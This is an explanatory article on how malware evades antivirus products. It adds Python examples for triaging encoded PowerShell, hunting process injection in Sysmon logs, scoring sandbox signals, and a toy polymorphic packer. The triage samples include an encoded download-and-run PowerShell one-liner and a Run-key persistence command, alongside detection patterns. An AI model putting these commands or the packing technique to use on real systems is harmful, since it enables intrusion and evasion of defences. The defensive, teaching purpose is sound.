Antivirus Evasion
Techniques used by malware to bypass detection by traditional antivirus solutions.
Understanding Antivirus Evasion
Antivirus evasion is a constant contest in cybersecurity: malware authors keep developing new techniques to bypass detection. Traditional AV solutions rely mainly on byte signatures and heuristics applied to files on disk, so modern malware uses obfuscation, polymorphism and in-memory execution to keep recognisable artifacts away from the scanner.
Techniques Used in Antivirus Evasion
1. Fileless Malware
Executes malicious code directly in process memory without writing a payload executable to disk.
Abuses built-in tools such as PowerShell, Windows Management Instrumentation (WMI) and scripts stored in the registry (for example, a Run key whose value launches an encoded PowerShell command).
Hard for file-scanning AV to catch because there is no file to scan, but it is not artifact-free: the payload still exists in memory, persistence lives in the registry or the WMI repository, and the launch shows up in process-creation, command-line and PowerShell script-block logs, which is where detection has to move.
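The point that fileless execution still leaves a command line behind is easiest to see on the most common launcher, an encoded PowerShell one-liner. The following is an added example (Python, not code from the original page): it decodes the base64/UTF-16LE payload of an -EncodedCommand argument as PowerShell itself would, and then scores the visible script against a small indicator list. The sample command lines, the indicator labels and the scoring are constructed for this example, not a vendor rule set.

```python
import base64
import re

# Indicator patterns applied to the visible command line plus any decoded script.
# Labels and patterns are this example's own choice, not a vendor rule set.
INDICATORS = [
    ("invoke-expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("web download", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)),
    ("nested base64", re.compile(r"FromBase64String", re.I)),
    ("reflective assembly load", re.compile(r"Reflection\.Assembly\]::Load", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("run-key persistence", re.compile(r"CurrentVersion\\Run\b", re.I)),
    ("wmi subscription persistence", re.compile(r"__EventFilter|CommandLineEventConsumer", re.I)),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"-e([a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def find_encoded(cmdline: str):
    """Return (base64_token, decoded_script) for an -EncodedCommand argument, else (None, None)."""
    for m in ENC_FLAG.finditer(cmdline):
        if not "ncodedcommand".startswith(m.group(1).lower()):
            continue  # -ExecutionPolicy, -ErrorAction and similar also begin with -e
        try:
            return m.group(2), base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None, None


def triage(cmdline: str) -> dict:
    """Decode if needed, then score the command line and decoded script together."""
    token, script = find_encoded(cmdline)
    visible = cmdline.replace(token, "<encoded>") if token else cmdline
    text = visible + ("\n" + script if script else "")
    hits = [label for label, rx in INDICATORS if rx.search(text)]
    return {"encoded": script is not None, "script": script, "indicators": hits,
            "score": len(hits) + (1 if script else 0)}


# Constructed sample command lines (not real telemetry), as they would appear in a
# process-creation event (Windows 4688 with command-line auditing, or Sysmon event 1).
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -NoP -W Hidden -enc " + encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    "powershell.exe -e " + encode_ps(
        "Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
        "-Name upd -Value 'powershell -w hidden -enc AAAA'"),
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = triage(line)
        print(r["score"], r["indicators"], (r["script"] or line)[:70])
```

The decoder deliberately rejects arguments such as -ExecutionPolicy that share the -e prefix, and it does not recurse: a decoded script that itself contains FromBase64String or a nested -enc is reported as an indicator rather than unpacked, because attackers chain several layers precisely to exhaust naive decoders.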
2. Polymorphic and Metamorphic Malware
Polymorphic Malware: keeps the malicious body encrypted and generates a fresh key and decryptor stub for every copy, so the bytes on disk change from sample to sample while the decrypted functionality stays the same. A static byte signature of the body no longer matches; only the varying stub is visible to the scanner.
Metamorphic Malware: goes a step further and rewrites its own instructions on each propagation (instruction substitution, register renaming, reordering, inserted junk code), so there is no constant encrypted body or decryptor left to sign.
Examples cited for this behaviour include ShapeShifter and Storm Worm; Storm Worm (2007) is the well-documented case, repacking its binaries on the server side at short intervals so that each download carried a different hash.
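To make concrete why a body signature stops matching after each generation, and why AV engines answered with emulation and memory scanning, here is an added example (Python, not code from the original page or from any malware family named above) of a toy polymorphic packer. The payload and signature are constructed strings standing in for machine code and an AV byte pattern; the header layout is this example's own invention, and the decryptor code is fixed here whereas a real engine rewrites it too.

```python
import hashlib
import random

# Constructed stand-in for a malware body. Real bodies are machine code; a readable
# string keeps the "signature" obvious.
PAYLOAD = b"CreateRemoteThread(LoadLibraryA, \"evil.dll\")"
# A byte signature an AV engine could have extracted from the plaintext body.
SIGNATURE = b"LoadLibraryA"

rng = random.SystemRandom()


def xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def generate_variant(payload: bytes) -> bytes:
    """One polymorphic generation: fresh random key, random-length junk prefix,
    encrypted body. Layout (assumed): [junk_len][junk][key_len][key][body_len:2][xor(body, key)].
    Real engines also rewrite the decryptor code; here only its data varies."""
    key = bytes(rng.randrange(256) for _ in range(rng.randint(4, 16)))
    junk = bytes(rng.randrange(256) for _ in range(rng.randint(0, 32)))
    body = xor(payload, key)
    return (bytes([len(junk)]) + junk + bytes([len(key)]) + key
            + len(body).to_bytes(2, "big") + body)


def unpack_variant(blob: bytes) -> bytes:
    """What the decryptor stub does at run time: parse the header, recover the body."""
    i = 0
    junk_len = blob[i]; i += 1 + junk_len
    key_len = blob[i]; i += 1
    key = blob[i:i + key_len]; i += key_len
    body_len = int.from_bytes(blob[i:i + 2], "big"); i += 2
    return xor(blob[i:i + body_len], key)


def static_scan(blob: bytes, sig: bytes = SIGNATURE) -> bool:
    """Signature scanner looking at the bytes as they sit on disk."""
    return sig in blob


def memory_scan(blob: bytes, sig: bytes = SIGNATURE) -> bool:
    """Scanner that unpacks (emulates) first and inspects what would actually execute."""
    return sig in unpack_variant(blob)


def compare(n: int = 8) -> dict:
    """Generate n variants and count how each scanning strategy fares."""
    variants = [generate_variant(PAYLOAD) for _ in range(n)]
    return {
        "distinct_hashes": len({hashlib.sha256(v).hexdigest() for v in variants}),
        "static_hits": sum(static_scan(v) for v in variants),
        "memory_hits": sum(memory_scan(v) for v in variants),
    }

if __name__ == "__main__":
    print(compare())
```

Every generation has a new hash and defeats the on-disk signature, yet the decrypted body is identical each time, which is exactly what an emulating or memory-scanning engine catches. That asymmetry is why the next step for attackers was metamorphism (no constant body to recover) and in-memory-only execution.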
3. Process Injection Techniques
Injects malicious code into a legitimate, already-running process so that the malicious activity appears to come from a trusted image and survives scans aimed at the original dropper.
Common methods include:
DLL Injection: writes the path of a malicious Dynamic Link Library (DLL) into the target process and starts a remote thread at LoadLibrary, so the target loads and runs it.
Process Hollowing: starts a trusted executable suspended, unmaps its image, writes the malicious image in its place and resumes the main thread, so the process name and path look legitimate while the code is not.
Atom Bombing: disclosed in 2016; writes the payload into the target's memory through the global atom table (GlobalAddAtom, then GlobalGetAtomName executed inside the target via an asynchronous procedure call) instead of WriteProcessMemory, so it sidestepped the API hooks many AV products relied on at the time rather than being inherently undetectable.
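All three methods end with a thread starting in a process that did not create it, which is the event defenders hunt. The following is an added example (Python, not code from the original page) of that hunt run over constructed Sysmon Event ID 8 (CreateRemoteThread) records: it flags threads whose start address is not backed by any loaded module, threads entering at LoadLibrary (the DLL-injection pattern), sources running from user-writable directories, and sensitive targets. The flat key=value layout, the allowlist and the scoring thresholds are assumptions of this example; Sysmon's real export is XML.

```python
import re
from pathlib import PureWindowsPath

# Constructed events in a flat key=value form (Sysmon's own export is XML); the
# field names are those of Sysmon Event ID 8 (CreateRemoteThread).
SAMPLE_EVENTS = [
    "EventID=8|UtcTime=2024-05-01 09:58:02|SourceImage=C:\\Windows\\System32\\csrss.exe"
    "|SourceProcessId=612|TargetImage=C:\\Windows\\System32\\notepad.exe|TargetProcessId=5120"
    "|StartAddress=0x7FFB4A0C2A10|StartModule=C:\\Windows\\System32\\ntdll.dll|StartFunction=RtlUserThreadStart",
    "EventID=8|UtcTime=2024-05-01 10:02:11|SourceImage=C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe"
    "|SourceProcessId=4120|TargetImage=C:\\Windows\\explorer.exe|TargetProcessId=2316"
    "|StartAddress=0x1F3A0000|StartModule=|StartFunction=",
    "EventID=8|UtcTime=2024-05-01 10:05:40|SourceImage=C:\\Program Files\\Vendor\\agent.exe"
    "|SourceProcessId=3344|TargetImage=C:\\Windows\\System32\\notepad.exe|TargetProcessId=5120"
    "|StartAddress=0x7FFB4B3E0A40|StartModule=C:\\Windows\\System32\\KERNEL32.DLL|StartFunction=LoadLibraryA",
]

# Assumed allowlist of images that legitimately create remote threads on this host.
ALLOWED_SOURCES = {"c:\\windows\\system32\\csrss.exe", "c:\\windows\\system32\\wbem\\wmiprvse.exe"}
SENSITIVE_TARGETS = {"lsass.exe", "explorer.exe", "winlogon.exe", "svchost.exe"}
USER_WRITABLE = re.compile(r"\\(?:Temp|Downloads|AppData|Public|ProgramData)\\", re.I)


def parse_event(line: str) -> dict:
    """Split the constructed 'key=value|key=value' record into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def assess(ev: dict):
    """Score one CreateRemoteThread event; returns (score, reasons)."""
    src, tgt = ev["SourceImage"], ev["TargetImage"]
    if src.lower() in ALLOWED_SOURCES:
        return 0, []
    score, reasons = 0, []
    if not ev["StartModule"]:
        score += 3; reasons.append("thread starts in memory not backed by any module")
    if ev["StartFunction"].lower().startswith("loadlibrary"):
        score += 2; reasons.append("thread entry is LoadLibrary (classic DLL injection)")
    if USER_WRITABLE.search(src):
        score += 2; reasons.append("source image runs from a user-writable directory")
    if PureWindowsPath(tgt).name.lower() in SENSITIVE_TARGETS:
        score += 1; reasons.append("target is a sensitive system process")
    return score, reasons


def hunt(lines, threshold: int = 2):
    """Return alert dicts for every Event ID 8 record scoring at or above threshold."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "8":
            continue
        score, reasons = assess(ev)
        if score >= threshold:
            alerts.append({"time": ev["UtcTime"], "source": ev["SourceImage"],
                           "target": ev["TargetImage"], "score": score, "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS):
        print(a["time"], a["score"], a["source"], "->", a["target"], a["reasons"])
```

An empty StartModule is the strongest single signal: legitimate remote threads start in a loaded DLL, while injected shellcode and process-hollowed images start in private memory. Atom Bombing and hollowing both produce that shape, even though neither calls WriteProcessMemory in the usual way.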
4. Sandbox and Virtual Machine Detection
Malware checks whether it is running inside an analysis sandbox or virtual machine (VM) and then exits, sleeps or takes a benign code path, so that analysts and automated systems never observe the malicious behaviour.
Techniques include:
Checking for virtualization artifacts (VMware or VirtualBox device and driver names, SMBIOS vendor strings, MAC address prefixes assigned to hypervisor vendors).
Checking system uptime, CPU count and RAM size: a machine that booted minutes ago with one core and little memory looks like a freshly provisioned analysis VM rather than a user's workstation.
Delaying execution, or waiting for user interaction such as mouse movement or document scrolling, so that time-limited automated sandboxes finish before any malicious behaviour is observed.
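To show which signals these checks actually read, here is an added example (Python, not code from the original page) written from the analyst's side: it gathers the uptime, CPU, memory, MAC and SMBIOS signals a sample would look at and scores them. The vendor OUI list, the thresholds and the two sample snapshots are assumptions of this example; the collector is best-effort for Linux and Windows and leaves unavailable values as None.

```python
import os
import platform
import uuid

# MAC OUI prefixes registered to hypervisor vendors (assumed list for this example).
VM_MAC_PREFIXES = {"00:05:69", "00:0c:29", "00:1c:14", "00:50:56",   # VMware
                   "08:00:27",                                        # VirtualBox
                   "00:15:5d",                                        # Hyper-V
                   "52:54:00"}                                        # QEMU/KVM
VM_VENDOR_STRINGS = ("vmware", "virtualbox", "innotek", "qemu", "kvm", "xen", "bochs")


def collect_snapshot() -> dict:
    """Best-effort environment snapshot (Linux and Windows); missing values stay None."""
    snap = {"uptime_s": None, "cpus": os.cpu_count(), "ram_gb": None, "mac": None, "vendor": ""}
    node = uuid.getnode()
    snap["mac"] = ":".join(f"{(node >> shift) & 0xFF:02x}" for shift in range(40, -1, -8))
    if platform.system() == "Linux":
        try:
            with open("/proc/uptime") as f:
                snap["uptime_s"] = float(f.read().split()[0])
            snap["ram_gb"] = os.sysconf("SC_PAGE_SIZE") * os.sysconf("SC_PHYS_PAGES") / 2**30
            parts = []
            for name in ("sys_vendor", "product_name"):
                with open(f"/sys/class/dmi/id/{name}") as f:
                    parts.append(f.read().strip())
            snap["vendor"] = " ".join(parts)
        except (OSError, ValueError):
            pass  # containers and minimal images often lack /sys/class/dmi
    elif platform.system() == "Windows":
        import ctypes
        k32 = ctypes.windll.kernel32
        k32.GetTickCount64.restype = ctypes.c_ulonglong
        snap["uptime_s"] = k32.GetTickCount64() / 1000
    return snap


def sandbox_score(snap: dict):
    """Return (score, reasons); each reason is a signal malware is known to test for."""
    score, reasons = 0, []
    if snap.get("uptime_s") is not None and snap["uptime_s"] < 600:
        score += 1; reasons.append("booted less than 10 minutes ago")
    if snap.get("cpus") is not None and snap["cpus"] < 2:
        score += 1; reasons.append("single CPU")
    if snap.get("ram_gb") is not None and snap["ram_gb"] < 2:
        score += 1; reasons.append("less than 2 GB RAM")
    if snap.get("mac") and snap["mac"][:8].lower() in VM_MAC_PREFIXES:
        score += 1; reasons.append("MAC OUI belongs to a hypervisor vendor")
    vendor = (snap.get("vendor") or "").lower()
    if any(s in vendor for s in VM_VENDOR_STRINGS):
        score += 1; reasons.append("SMBIOS vendor/product names a hypervisor")
    return score, reasons


# Constructed snapshots: a typical analysis VM and a user workstation.
ANALYSIS_VM = {"uptime_s": 95.0, "cpus": 1, "ram_gb": 1.0, "mac": "08:00:27:4e:11:c2",
               "vendor": "innotek GmbH VirtualBox"}
WORKSTATION = {"uptime_s": 312000.0, "cpus": 8, "ram_gb": 16.0, "mac": "3c:22:fb:9a:10:44",
               "vendor": "Dell Inc. Latitude 7420"}

if __name__ == "__main__":
    print("analysis VM:", sandbox_score(ANALYSIS_VM))
    print("workstation:", sandbox_score(WORKSTATION))
    print("this host:  ", sandbox_score(collect_snapshot()))
```

Two practical consequences follow. Sandboxes counter these checks by spoofing exactly these values (long uptime, several cores, a non-hypervisor MAC and vendor string, simulated mouse input), so a sample's checks are only as good as the sandbox's laziness. And the evasion is itself a behaviour: a binary that reads SMBIOS strings, enumerates MACs and then sleeps for twenty minutes has already told a behavioural engine what it is.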
Common Applications of Antivirus Evasion
Advanced Persistent Threats (APTs)
Used by nation-state actors and cybercriminal groups to maintain long-term access to targeted systems.
Avoids detection through stealthy, persistent malware.
Ransomware Attacks
Modern ransomware strains use evasion techniques to get past security controls before encrypting files, since the encryption phase itself is noisy and must not be interrupted.
Example: Ryuk injected its payload into already-running processes with remote-thread injection, so that the encryption routine ran under a legitimate process name rather than as the dropped executable.
Trojan Horse Attacks
Malware that presents itself as legitimate software (an installer, a cracked application, a document viewer) while executing malicious activities in the background.
Uses code obfuscation and encryption of strings and payloads to stay undetected by static scanning.